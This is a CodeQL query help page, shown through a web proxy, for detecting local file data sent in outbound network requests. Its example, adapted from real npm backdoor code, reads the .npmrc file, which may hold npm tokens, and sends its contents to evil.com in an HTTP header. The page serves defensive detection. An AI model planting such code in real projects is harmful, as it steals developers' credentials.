File data in outbound network request¶

ID: js/file-access-to-http
Kind: path-problem
Security severity: 6.5
Severity: warning
Precision: medium
Tags:
   - security
   - external/cwe/cwe-200
Query suites:
   - javascript-security-extended.qls
   - javascript-security-and-quality.qls

Click to see the query in the CodeQL repository

Sending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation¶

Examine the highlighted code closely to ensure that it is behaving as intended.

Example¶

The following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the .npmrc file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.

var fs = require("fs"),
    https = require("https");

var content = fs.readFileSync(".npmrc", "utf8");
https.get({
  hostname: "evil.com",
  path: "/upload",
  method: "GET",
  headers: { Referer: content }
}, () => { });

References¶

ESLint Blog: Postmortem for Malicious Packages Published on July 12th, 2018.
OWASP: Sensitive Data Exposure.
OWASP: Trojan Horse.
Common Weakness Enumeration: CWE-200.

© GitHub, Inc.
Terms
Privacy

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.

Alternative Proxies:

Alternative Proxy